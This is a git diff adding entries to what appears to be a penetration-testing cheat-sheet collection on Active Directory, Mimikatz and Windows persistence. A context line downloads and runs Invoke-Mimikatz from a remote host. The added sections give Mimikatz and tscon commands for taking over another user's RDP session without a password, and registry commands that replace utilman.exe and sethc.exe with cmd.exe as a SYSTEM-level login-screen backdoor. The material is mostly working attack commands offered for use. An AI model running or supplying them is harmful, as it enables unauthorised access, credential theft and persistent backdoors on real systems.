diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 1a0baaf..d709ed4 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -124,6 +124,12 @@ powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" ``` +* [ADRecon](https://github.com/sense-of-security/ADRecon) + + ```powershell + .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser + ``` + * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) ```powershell diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 6e28b25..6a40954 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -70,6 +70,23 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab ``` +## Mimikatz RDP session takeover + +Run tscon.exe as the SYSTEM user, you can connect to any session without a password. + +```powershell +privilege::debug +token::elevate +ts::remote /id:2 +``` + +```powershell +# get the Session ID you want to hijack +query user +create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55" +net start sesshijack +``` + ## Mimikatz commands | Command |Definition| diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index d005bd8..ea1ccb7 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -11,6 +11,7 @@ * [HKLM](#hklm) * [Services](#services) * [Scheduled Task](#scheduled-task) + * [RDP Backdoor](#rdp-backdoor) * [References](#references) @@ -114,6 +115,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S PS C:\> Register-ScheduledTask Backdoor -InputObject $D ``` +### RDP Backdoor + +#### utilman.exe + +At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM. + +```powershell +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f +``` + +#### sethc.exe + +Hit F5 a bunch of times when you are at the RDP login screen. + +```powershell +REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f +``` + + ## References * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)